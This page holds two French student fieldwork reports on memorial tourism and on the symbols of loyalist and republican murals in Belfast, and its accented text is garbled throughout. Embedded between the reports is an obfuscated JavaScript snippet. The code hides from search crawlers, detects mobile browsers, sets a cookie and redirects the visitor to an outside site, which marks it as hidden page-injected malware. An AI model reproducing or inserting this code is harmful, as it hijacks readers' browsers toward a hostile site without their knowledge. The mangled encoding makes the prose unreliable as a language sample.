Enfin, la derniA?re expA�rience qui nous oblige contre toute attente A� rA�futer notre deuxiA?me hypothA?se est celle du Loyalist Museum. En ce qui concerne la premiA?re partie nous prA�sentant le musA�e en tant que tel, le guide nous a donnA� beaucoup da��informations de faA�on trA?s unilatA�rale sans nous laisser la possibilitA� de poser des questions pendant la��intervention. Notre participation a donc A�tA� trA?s limitA�e et nous sommes devenues, une fois de plus, spectatrices da��une performance identitaire. Nous avons A�galement eu le mA?me ressenti lors de la seconde partie de la visite. En effet, le guide nous a parlA� en grande partie des forces armA�es protestantes en louant leurs A�A�exploitsA�A� sans chercher A� avoir un rA�el A�change avec le visiteur. La prA�sentation du quartier de East Belfast a A�tA� faite de maniA?re trA?s partiale. Notre capacitA� A� poser des questions A�tait passablement limitA�e et nous avons eu la��impression que nos remarques A� la��encontre de leur point de vue na��A�taient pas les bienvenues, ce qui a rendu la��atmosphA?re assez particuliA?re.

Avec un peu de recul, nous gardons la��impression que ce manque de pA�dagogie ne nous a pas conduit A� une assimilation optimale de la mA�moire. Cependant, ces critiques ne tiennent qua��A� nous, et nos attentes dA�finies au prA�alable ont sans doute biaisA� nos impressions.

b) PA�dagogie et construction de mA�moire

Bien que les arguments allant A� la��encontre de notre deuxiA?me hypothA?se soient nombreux, nous avons tout de mA?me pu assister A� des visites qui nous permettent de la vA�rifier. Nous avons eu la��occasion de visiter le Centre GaA�lique CultA?rlann McAdam A� Fiaich oA? nous avons A�tA� informA�es A� propos de la culture gaA�lique. MalgrA� le fait que la thA�matique des Troubles na��ait pas A�tA� abordA�e, nous avons jugA� pertinent de mentionner cette visite dans le cadre de notre deuxiA?me hypothA?se, car elle montre cette modalitA� pA�dagogique du tourisme. En effet, le but de ce centre est la perpA�tuation de la culture gaA�lique. Pour ce faire, il nous a A�tA� distribuA� A� chacun un petit livret avec les expressions courantes traduites de la��anglais au gaA�lique. Il y a donc eu une rA�elle interaction entre le guide et nous-mA?mes ce qui a rendu la visite plus pA�dagogique, tout en nous immergeant bien dans la problA�matique en question.

Enfin, la visite qui contribue le plus A� la vA�rification de notre deuxiA?me hypothA?se est sans doute le tour en Black Cab. ArrivA�es vers notre taxi, le guide-conducteur sa��est prA�sentA� en nous demandant ce que nous voulions savoir sur Belfast.

Ca��est exactement A� ce genre da��attitude que nous nous attendions dans le cadre da��un tourisme pA�dagogique. En effet, notre guide sa��est assurA� de savoir ce qui nous intA�ressait afin de ne pas sa��attarder sur des A�lA�ments historiques na��ayant qua��une importance secondaire pour nous. Tout au long de notre rencontre, ce dernier a adaptA� son parcours en fonction de nos attentes et nos dA�sirs, crA�ant ainsi un vA�ritable A�change. Ce dernier sa��est A� plusieurs reprises inquiA�tA� de savoir si nous comprenions bien, en nous demandant toujours si nous avions des questions. Lorsqua��il sa��est aperA�u que nous prenions beaucoup de notes sur notre carnet de terrain, il sa��est empressA� de nous proposer de descendre du taxi afin de spatialiser son rA�cit. Bien que sa vision du conflit soit biaisA�e par son positionnement politico-religieux, cela na��A�tait pas gA?nant, car nous sentions bien qua��il A�tait ouvert A� la discussion et A� nos remarques. A plusieurs reprises, nous avons eu la��opportunitA� de lui poser des questions personnelles, il na��a jamais montrA� de mA�contentement A� notre A�gard et sa��est toujours arrangA� pour nous rA�pondre de la meilleure faA�on possible.

Pour conclure, on constate donc que la��offre touristique proposant des circuits pA�dagogiques est mince, mais pas inexistante. Nous sommes conscientes que nous na��avons pas expA�rimentA� toutes les formes de tourisme A� Belfast, mais nous avons tout de mA?me pu remarquer que les visites sont souvent mises en place de maniA?re unilatA�rale en ne cherchant pas da��A�change constructif avec le visiteur. La grande exception est donc celle de la visite avec les Black Cabs qui nous a permis da��avoir une interaction active et constructive avec le guide, A�galement acteur du conflit.

3.2 Tourisme et territorialisation mA�morielle

Afin de voir si les modalitA�s touristiques contribuant A� la perpA�tuation de la mA�moire tendent A� le faire en certains lieux spA�cifiques, nous allons analyser la dimension spatiale de nos expA�riences.

Pour ce qui est de notre City Tour en bus, la mA�moire du conflit tend A� A?tre spatialisA�e dans les quartiers de Falls et de Shankill, mais nous ne sommes passA�es que trA?s rapidement en ces lieux. Certes, la visite de ces quartiers contribue A� la diffusion da��une image A� la��A�tranger par le biais da��une territorialisation de la mA�moire, mais notre passage A�tait trop rapide pour affirmer qua��il existe un rA�el lien entre les souvenirs du conflit et certains lieux. Tel na��a pas A�tA� le cas avec la compagnie de taxi : notre chauffeur nous a conduit plus ou moins dans les mA?mes lieux que le bus, mais da��une toute autre maniA?re. Alors que nous ne faisions que passer devant les murals lors de notre City Tour, nous avions cette fois la��opportunitA� de descendre du taxi et ainsi de pratiquer la��espace. La��effet de territorialisation de la mA�moire dans certaines rues de Falls et Shankill A�tait bien plus fort, car nous avons eu la��opportunitA� de marcher dans les rues tout en A�coutant les expA�riences personnelles de notre chauffeur. Enfin, lors de la visite du quartier de East Belfast, notre guide avait tendance A� spatialiser la mA�moire du conflit en certains lieux emblA�matiques.

Ce dernier sa��est arrA?tA� plusieurs fois dans des mA�moriels protestants et sa��attardait devant certaines fresques emblA�matiques des groupes armA�s loyalistes, ce qui avait pour effet da��ancrer son rA�cit en certains lieux spA�cifiques. Cet effet de territorialisation de la mA�moire est efficace : A� la��avenir, nous associerons les souvenirs A�voquA�s par notre guide A� certains lieux prA�cis, que nous pouvons alors qualifier de lieux de mA�moire

Pour conclure, nous avons vu que la mA�moire tend gA�nA�ralement A� A?tre territorialisA�e dans certaines rues emblA�matiques des quartiers de Shankill et Falls. Aussi, nous constatons que certains lieux ou monuments, tels que les murals les plus cA�lA?bres, les grands mA�moriaux ou de maniA?re gA�nA�rale les quartiers emblA�matiques traversA�s par les peacelines, figurent de maniA?re rA�currente dans les propositions de circuits touristiques. Cela peut A?tre dA� A� leur caractA?re artistique da��une part et politique de la��autre. Cependant, bien que nous puissions dA�celer dans les deux derniA?res visites mentionnA�es un processus de territorialisation de la mA�moire, nous estimons que cela na��est pas suffisant pour vA�rifier cette troisiA?me hypothA?se.

4. Conclusion

Lorsque nous sommes arrivA�es A� Belfast, nous avons dA� faire face A� certaines difficultA�s. En effet, nous avions une idA�e passablement arrA?tA�e sur la forme qua��allait prendre notre travail de terrain. Par exemple, au dA�but de nos recherches, nous A�tions trA?s focalisA�es sur le contenu des discours tenus par les acteurs de la��offre touristique. Or, nous nous sommes vite aperA�ues que dans le cadre de notre travail, le contenu importait moins que la forme et la maniA?re de prA�senter les A�vA�nements passA�s dans le processus de co-construction mA�morielle. Peu A� peu, nous nous en sommes rendues compte et nous avons modifiA� notre maniA?re de rA�colter nos donnA�es afin que ces derniA?res nous apportent de rA�els A�lA�ments de rA�ponses. Nous avons donc cessA� de prendre note des informations factuelles qui nous A�taient transmises et nous nous sommes concentrA�es sur le comportement et la��attitude des acteurs de la��offre touristique.

En conclusion, notre sA�jour A� Belfast nous a effectivement permis de relever deux modalitA�s de la��offre touristique belfastoise qui tendent A� inclure le visiteur A� la production de mA�moire. En effet, nous avons constatA� que certains acteurs mettent bien en place des circuits pA�dagogiques et valorisent les rA�cits personnels dans le but de perpA�tuer la mA�moire du conflit. Bien que ces deux modalitA�s ne soient pas gA�nA�ralisables A� la��entiA?retA� de la��offre touristique belfastoise, nous estimons que nos donnA�es sont suffisantes pour vA�rifier nos deux hypothA?ses relatives A� la mise en scA?ne de rA�cits personnels et de circuits pA�dagogiques dans le cadre da��un tourisme mA�moriel.

Aussi, notre travail de terrain nous a permis de rA�pondre de maniA?re plus ou moins complA?te A� la premiA?re partie de notre question de recherche. Tel ne fut pas le cas pour notre troisiA?me hypothA?se relative A� la territorialisation de la mA�moire dans le cadre du tourisme belfastois. Comme mentionnA� ci-dessus, nous manquons da��informations afin da��affirmer qua��il existe un rA�el processus de territorialisation mA�morielle. Bien que nous soyons restA�es plus da��une semaine A� Belfast, nous na��avons pas eu le temps de rA�colter le matA�riel nA�cessaire afin de mener A� bien une analyse exhaustive de ce processus. Une agence touristique nous a proposA� un walking tour dont il aurait A�tA� intA�ressant de comparer le parcours avec ceux proposA�s par le City Tour et les Black Cabs. Malheureusement, nous nous sommes vues prises par le temps et nous avons dA� renoncer A� cette opportunitA�. Da��autres facteurs nous ont freinA�es dans la��analyse des processus de territorialisation mA�morielle, notamment notre manque da��expA�rience et de connaissances en la matiA?re. Aussi, la littA�rature relative A� ce sujet est passablement lacunaire, bien que certains auteurs aient thA�orisA� le concept de lieu de mA�moire, notamment A-C. Morand (2009), J-D. Urbain (2003), et A. Hertzog (2012). Ces A�lA�ments nous ont empA?chA� de maA�triser rA�ellement cette thA�matique, ce qui a entravA� nos recherches sur le terrain.

Pour aller plus loin, dans le cadre da��une recherche plus globale et reprA�sentative, il serait intA�ressant de multiplier les expA�riences touristiques afin da��avoir une rA�elle vision da��ensemble de ce qui est proposA� A� Belfast. En effet, le programme proposA� par nos enseignantes A�tant assez chargA�, nous avons dA�cidA� de concentrer nos recherches sur les visites prA�vues. Quitte A� diminuer la reprA�sentativitA� de nos rA�sultats ainsi que leur potentielle gA�nA�ralisation, nous avons prA�fA�rA� mener une analyse approfondie da��un nombre restreint de visites et de prospectus. Si nous nous A�tions basA�es sur un trop large panel da��expA�riences touristiques, cela nous aurait conduit A� une analyse plus superficielle du matA�riau collectA�.

Enfin, nous avons conscience que notre analyse a A�tA� passablement non-exhaustive A�tant donnA� le temps qui nous A�tait imparti. Il serait intA�ressant da��analyser en profondeur les logiques de spatialisation de la mA�moire des acteurs de la��offre touristique. En effet, cette thA�matique revA?t da��un grand intA�rA?t de par son caractA?re inA�dit, relativement inexplorA� et intrinsA?quement liA� A� la gA�ographie. Une fois la territorialisation de la mA�moire thA�orisA�e, une voie A� suivre afin da��aller encore plus loin pourrait A?tre da��analyser les buts de la crA�ation des lieux de mA�moire et leurs effets rA�els sur la population locale et A�trangA?re.

5. Bibliographie

CAIN Web Service (2006). Some Frequently Asked Questions a�� The Northern Ireland Conflict [En ligne]. http://cain.ulst.ac.uk/faq/faq2.htm#when (consultA� le 30 mars 2016).

BALLIF Florine (2014). A�A�A�Belfast en temps de paix : la guerre civile comme attraction touristiqueA�. TA�oros [En ligne], Vol. 34, NA�1-2, pp.2-23. https://teoros.revues.org/2761 (ConsultA� le 20 mars 2016).

BALLIF Florine (2012). A�A�Les peacelines de Belfast : le provisoire qui dureA�A�. HermA?s, La Revue [En ligne], Vol.2, NA�63, pp.116-119. https://www.cairn.info/load_pdf.php?ID_ARTICLE=HERM_063_0116 (ConsultA� le 1 fA�vrier 2016).

BROWN Kris, MACGINTY Roger (2003). A�A�Public attitudes toward partisan and neutral symbols in post-agreement Northern IrelandA�A�. IdentitiesA�: Global studies in culture and power [en ligne], Vol.10 NA�1, pp.83-108. http://www.tandfonline.com/doi/abs/10.1080/10702890304337 (ConsultA� le 16 fA�vrier 2016)

CRAHAY FrA�dA�ric (2014). A�A�Tourisme mA�morielA�A�. TA�moigner. Entre histoire et mA�moire. Revue pluridisciplinaire de la Fondation Auschwitz, NA�117, pp. 151-152.

EQUIPE M. I. T. (2000). A�A�La mise en tourisme des lieux: un outil de diagnosticA�A�.A� Mappemonde, Vol. 57, NA�1, pp. 1-6.

HERNANDEZ Julie (2008). A�A�Le tourisme macabre A� La Nouvelle-OrlA�ans aprA?s Katrina : rA�silience et mA�morialisation des espaces affectA�s par des catastrophes majeuresA�A�. Norois [en ligne], Vol.3, NA�208, pp. 61-73. http://norois.revues.org/2208 (ConsultA� le 16 fA�vrier 2016).

HERTZOG Anne (2012). A�A�Tourisme de mA�moire et imaginaire touristique des champs de batailleA�A�. Via, Revue internationale interdisciplinaire de tourisme [En ligne], NA�1, pp.1-16.http://viatourismreview.com/wp-content/uploads/2015/06/Article6.pdf (ConsultA� le 16 fA�vrier 2016).

LEGRAND Caroline (2002). A�A�Du tourisme gA�nA�alogique dans l’Irlande contemporaineA�A�. Revue de SynthA?se, Vol.123, NA�1, pp. 131-147.

LISLE Debbie (2006). A�A�Local symbols, global networks: rereading the murals of BelfastA�A�. Alternatives: Global, Local, Political, Vol. 31, NA�1, pp. 27-52.

MORAND Anne-CA�line (2009). MA�moires de Belfast: Les processus de la mise en tourisme de la mA�moire et leurs expressions spatiales. MA�moire professionnelA�: UniversitA� de Paris 1, PanthA�on Sorbonne, 190p. https://www.univ-paris1.fr/fileadmin/IREST/Memoires_Masters_2/MORAND_Anne-Celine.pdf (ConsultA� le 12 fA�vrier 2016).

NAEF Patrick James (2013). A�A�Tourisme de mA�moire, instrument de paix et/ou de rA�conciliationA�A�. Quand le tourisme questionne la mA�moire [En ligne], pp.70-80. https://archive-ouverte.unige.ch/unige:27745 (ConsultA� le 2 juin 2016).

PETITIER Paule (1989). A�A�Les Lieux de mA�moireA�A�. Romantisme [En ligne], Vol. 19, NA�63, pp. 103-110. www.persee.fr/doc/roman_0048-8593_1989_num_19_63_5570 (ConsultA� le 13 fA�vrier 2016).

URBAIN Jean-Didier (2003). A�A�Tourisme de mA�moire : un travail de deuil positifA�A�. Cahier Espaces, NA�80, pp.5-7.

Photographie A� la une: MA�moriel dans le quartier de East Belfast,A�par Valentina Ferreira GutiA�rrez, mars 2016.

[1] CAIN Web service [en ligne], http://cain.ulst.ac.uk/faq/faq2.htm#when consultA� le 20 mai 2012

[2] UFFA�: Real Ulster Freedom Fighters a�� UDAA�: Ulster Defense Association a�� UYMA�: Ulster Young Militance

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Des symboles pour se justifier

A�Quels sont les diffA�rents registres de justification par les deux partis ?

Introduction : Plusieurs maniA?res de se justifier

Par Darell Bloch, AngA?le Canelli et Louis Romaneschi

Avant propos :

Dans cette A�tude nous traiterons des registres de justifications des deux partis. Pour faciliter la comprA�hension de notre recherche il est important de comprendre ce qua��est un registre de justification et A�galement comment qualifier les deux partis.

On peut appeler registre de justification un ensemble de caractA�ristiques trouvA�es dans un texte, un discours ou dans toute forme da��expression visuelle visant A� justifier la ou les action(s) rA�alisA�e(s) par la��acteur au regard du spectateur.

En ce qui concerne les deux partis, nous utiliserons donc trois faA�ons de les qualifier, A� savoir :

  • le parti plutA?t da��origine irelandaise, qui est nationaliste, rA�publicain et catholique;
  • le parti plutA?t da��origine anglaise, qui est unioniste, loyaliste et protestant.

  1. Introduction : Plusieurs maniA?res de se justifier

Les murals ne sont pas neutres. Ces peintures apparaissent petit A� petit dans les rues de Belfast en parallA?le avec le conflit qui oppose rA�publicains irlandais aux loyalistes, fidA?les A� la couronne britannique. Ces peintures murales ont un caractA?re fondamentalement politique : les partis belligA�rants utilisent ce moyen graphique afin de faire de la propagande, dA�marquer leur territoire, da��acquA�rir de nouveaux sympathisants, ou alors de menacer la��ennemi. Elles se positionnent da��un cA?tA� ou de la��autre des partis engagA�s en faisant rA�fA�rence A� des symboles, A� des personnages et A� des A�vA�nements historiques liA�s A� la��hA�ritage culturel de chaque parti. En utilisant cette dialectique les deux partis justifient leur prise de position dans le conflit. Chacune des murals comporte donc une dimension fortement idA�ologique malgrA� leur apparence pouvant paraA�tre neutre. Cette mobilisation de symboles religieux, militaristes, culturels et nationalistes sur les murals peut A?tre perA�ue comme un ensemble da��arguments lA�gitimant la��existence et les revendications de chacun des partis. A�Ces muralsA�ont une capacitA� da��impact politique directe sur la population et sur tout autre observateur puisqu’elles sont situA�esA�dans la��espace public. Apparaissant sous une forme artistique, les murals sont en rA�alitA� une forme de propagande visant A� ressasser le spectre de la��opposition entre catholiques et protestant, les murs de Belfast deviennent alors un enjeux important du conflit. A�La��objectif de notre recherche est de mettre en lumiA?re les diffA�rents registres de justification mobilisA�s par chacun des partis dans les murals et da��expliciter le sens que les partis veulent donner aux murals.

Pour ce faire nous allons analyser de maniA?re comparative les murals unionistes et les murals rA�publicaines. Nous prA�senterons un tableau graphique rA�pertoriant les symboles les plus frA�quents et explicitant leurs significations et histoire. Cette classification sera une clef de lecture de notre travail, qui mobilisera ces symboles afin da��expliquer les diffA�rents registres de justification du conflit. En effet, ce lexique appuiera notre recherche, qui dA�taillera les diffA�rentes maniA?res par lesquelles les partis mobilisent ce langage graphique A� leurs fins politiques et culturelles. Nous avons pu mis en exergueA�plusieurs registres de justification ; tout da��abord la��exacerbation de registres culturels irlandais ou loyalistes, le ralliement A� des conflits internationaux, et enfin la victimisation de chacun des partis.

Exacerbation de la culture :

Le premier registre de justification que nous traitonsA�est celui de l’exacerbation culturelle, ou ce que nous intitulonsA�a�?la��hyperculturalisationa�?. Cet outil conceptuel utilisA� pour notre analyse se dA�finit par la volontA� da��une communautA� de se crA�er et de mobiliser un patrimoine culturel qui lui est propre. La��hyperculturalisation se caractA�rise par la grande utilisation de toutes sortes de particularitA�s culturelles communautaires A� des fins de diffA�renciation, par rapport au parti adverse. Ca��est une crA�ation de la��altA�ritA�, un processus qui a pour but de renforcer la��appartenance A� la��identitA� culturelle de son parti. Dans cette pA�riode post-conflit, A� Belfast, cette exacerbation de la culture est bel et bien encore utilisA�e, A� des fins politiques, historiques et mA�morielles. Cette logique que la��on pourrait considA�rerA�comme une mobilisation trA?s marquA�e da��un hA�ritage, va diffA�rer entre protestants et catholiques, et dA�passer le cadre des murals en se retrouvant dans plusieurs aspects de la vie quotidienne.

A la��A�chelle gA�ographique da��une ville qui na��est pas plus grande que GenA?ve, ces logiques da��hyperculturalisation peuvent en effet A?tre trA?s marquA�es: on identifierait un protestant ou un catholique A� travers son style vestimentaire, sa faA�on de sa��exprimer, son lieu de rA�sidence. Nous retrouvons ces aspects de diffA�renciation que ce soit dans la��usage de la langue gaA�lique, parlA�e exclusivement par des communautA�s catholiques, ou mA?me jusque dans les sports pratiquA�s: le football A�tant plus pratiquA� par les catholiques alors que le rugby est plus commun chez les protestants. Notre sujet da��analyse A�tant les murales, nous ne nous attarderons guA?re sur la��exacerbation culturelle dans les comportements sociaux, mais traiterons le sujet A� travers les symboles prA�sent dans la��iconographie des murales. Nous procA�derons en faisant une analyse comparative des logiques da��utilisation symbolique de chacun des partis, tout en illustrant nos propos avec quelques exemples. Par ailleurs, notre grille des symboles (annexe 1) permettra de rA�fA�rencer et de situer les symboles les plus importants afin de ne pas reprendre ces A�lA�ments dans la��analyse.

Tout da��abord, aprA?s avoir analyser les murales photographiA�es lors de nos terrains, nous pouvons distinguer dans les grandes lignes des logiques de mobilisation symboliques, allant sur des axes distincts, selon la��appartenance de la murale au clan unioniste ou rA�publicain.

Chez les unionistes, le registre symbolique est trA?s militarisA�A�etA�rendu historique; ce qui donne aux murales protestantes une dimension politique assez marquA�e. Ce constat se fait tout da��abord par leur composition, souvent rA�gie pour mettre en avant un blason, entourA� da��autres symboles (drapeaux, miniatures de personnages). La position centrale du blason qui incorpore la plupart du temps un drapeau de la��Union Jack, une couronne et la main rouge de la��Ulster (voir tableau en annexe), rappelle la centralitA� du pouvoir monarchique, avec les A�lA�ments qui la��entourent relA�guA�s au second plan, de par leur subordination hiA�rarchique. Dans ce cas, nous sommes face A� une vA�ritable prise de position en faveur de la culture monarchique, exacerbA�e par la mise en place da��une justification A� travers plusieurs symboles unionistes. Des A�lA�ments voulant dA�montrer la force militaire et A�conomique du Royaume-Uni sont A�galement avancA�s dans les murales loyalistes. Autour du blason central, des sujets rA�currents tels que les guerres mondiales, la puissance de la��Empire et la��importance de sa flotte (en grande partie construite dans le port de Belfast) constituent un argumentaire de la force du Royaume-Uni A� la��A�chelle locale et internationale. Ce a�?culte de la��Empirea�? est spA�cifique aux loyalistes qui vont chercher leur appui dans sa grandeur historique et A�conomique, et par des reprA�sentations de la matA�rialitA� de cette grandeur : bateaux, avions, troupes, bA?timents etc.. Cette matA�rialitA� de la force se retrouve dans les murales loyalistes reprA�sentant des milices de dA�fense armA�es, avec la plupart du temps un personnage cagoulA� brandissant une arme A� feu. Dans ce genre de murales, nous restons dans une logique da��explicitation de la force da��attaque, sa��illustrant A� travers la menace des symboles da��un a�?gunmana�? et de son arme pointA�e.

La reprA�sentation de personnages historiques, da��A�vA?nements marquants ou de monuments symboliques est A�galement frA�quente dans les fresques protestantes. Nous les voyons par exemple dans des murales dA�diA�es A� Oliver Cromwell (figure politique de la 1A?re rA�volution anglaise), de la bataille de la Somme, etca�� Les nombreuses allusions et commA�morations de ces personnages et A�vA?nements traduisent le dA�sir de sa��approprier et da��utiliser les faits du passA� pour justifier une cause prA�sente. Il y a alors une rA�interprA�tation et une manipulation de la��hA�ritage culturel et historique pour le mobiliser dans un contexte ou cet hA�ritage participera A� la distinction entre protestants et catholiques.

Du cA?tA� rA�publicain, l’exacerbation de la culture est A�galement trA?s marquA�e. Le registre symbolique rA�publicain est pourtant assez diffA�rent de celui des loyalistes et est fortement alimentA� par la��hA�ritage culturel gaA�lique et irlandais. La composition est trA?s rarement centrA�e sur un A�lA�ment en particulier, mais en favorise la��intA�gration de plusieurs. La grande mobilisation de symboles mythologiques montre le dA�sir des rA�publicains de se justifier A� travers la��anciennetA� de leurs racines, qui irait au delA� mA?me de la��A?re chrA�tienne. Harpes, divers tribaux irlandais, trA?fles et spirales servent A� la fois da��ornementation, et A� la fois de rappel de la��appartenance A� une culture ancestrale, plus pacifique et finalement moins politisA�e que la symbolique protestante. La��aspect plus colorA� et moins graphique des murales rA�publicaines sa��oppose au conformisme des murales protestantes, plus froides et directes et rappelant vaguement une iconographie qui se rapprocherait de propagandes fascistes et communistes. Le choix des couleurs na��est pas anodin : le vert rappelle dA�jA� la��Irlande, mais ca��est aussi le symbole de la paix et de la��espoir, en opposition avec le rouge plus violent utilisA� par les loyalistes. La��argument avancA� par les rA�publicains est le folklore inhA�rent A� la culture irlandaise, qui de par son caractA?re sympathique, peut A?tre interprA�tA� comme la��opposA� du cA?tA� menaA�ant de certaines murales loyalistes. Un aspect rA�current dans les murales rA�publicaines est la reprA�sentation de la rA�sistance, qui peut A?tre soit symbolisA�e par un phA�nix A�mergeant de ses cendres, soit par un paramilitaire non cagoulA� pointant son arme vers le ciel da��une pose dynamique. Nous remarquons ici que la��exacerbation de la solidaritA� A� travers la��adversitA�, de la bravoure et de l’hA�roA?sme est un trait de caractA?re que la communautA� catholique a essayA� de transparaA�tre au travers des murales.

A�Affiliation a des conflits A�trangers

Il est difficile de connaA�tre la part de vA�ritA� que les rA�cits des deux partis contiennent. Les conflits, nous la��avons compris, perdurent encore aujourda��hui. Leur A�tendue a da��ailleurs permit A� plusieurs gA�nA�rations belfastoises de vivre ce conflit. NA�anmoins il est A�vident que les gA�nA�rations actuelles ont des opinions diffA�rentes de celles des gA�nA�rations prA�cA�dentes. Il en est de mA?me pour la visibilitA� extA�rieure de la��histoire des troubles, celle ci a A�voluA� de maniA?re croissante depuis leurs dA�buts. Aujourda��hui, la population intA�ressA�e par les murales et par la��histoire de Belfast possA?de de nombreux moyens da��accA�der aux informations dA�sirA�es en comparaison avec la pA�riode durant laquelle les conflits ont dA�butA�, ca��est A� dire durant les annA�es 1920.

PrA�cA�demment, nous avons dA�taillA� la maniA?re avec laquelle les deux partis revendiquent au public extA�rieur leur culture, A� savoir par exemple, la culture celtique pour les nationalistes et la culture anglaise pour les loyalistes. Mais la��on ne trouve pas ces symboles culturels sur la totalitA� des murals. En effet, avec la��augmentation de la visibilitA�, ca��est A� dire la��exposition des faits des conflits au reste du monde, les partis ont du dA�velopper un ensemble da��arguments plus vaste que leurs arguments culturels. Nous allons donc voir dans cette partie les moyens visuels mis en oeuvre par les partis afin de rallier leur cause A� da��autres conflits internationaux. Autrement dit, comment les deux partis dA�fendent leur cause et leur opinion grA?ce aux illustrations des murals en puisant dans le contexte historique international. Cet effet ayant pour but de maximiser le soutien international.

En commenA�ant par le parti rA�publicain, on remarque que celui ci compare sa position avec la position da��autres groupes plus ou moins analogues ayant comme point commun le caractA?re minoritaire rA�primA� ou la��appartenance A� un peuple ne pouvant pas disposer de lui mA?me et tyrannisA�. Le parti est solidaire de beaucoup de minoritA�s injustement opprimA�es ou discriminA�es pour leurs opinions, leur appartenance ou leur sexualitA�. Les causes reviennent aux oppressions des homosexuels jusqua��A� la��oppression du peuple cubain. Nous pouvons notamment voir sur le mural A�ci dessous, qua��un dA�saccord est A�clairement exprimA� avec la politique da��Obama vis A� vis du peuple cubain. Le parti sa��engage A�galement A� reprA�senter le conflit territorial des Pays Basques.

Capture da��A�cran 2016-05-23 A� 17.49.54

On trouve ensuite un nombre important de murals nationalistes faisant rA�fA�rence au parti palestinien. Les signes reconnaissables sont ici, le drapeau de la Palestine et ses couleurs, la��utilisation de contenus textuels en calligraphie palestinienne.

Capture da��A�cran 2016-05-23 A� 17.50.06

Les nationalistes soulignent que ce peuple est soumis au joug da��un A�tat illA�gitime ne respectant pas le droit international. Les nationalistes rA�publicains sa��approprient le soutien rA�ciproque des conflit A�trangers, mais aussi se comparent directement A� des personnages internationaux connus et vus par une majoritA� de la population comme exemplaires ou respectables. Par exemple, comme on peut le voir dans la peinture murale reprA�sentant Bobby Sands et Nelson Mandela cA?te A� cA?te.

Capture da��A�cran 2016-05-23 A� 18.00.05

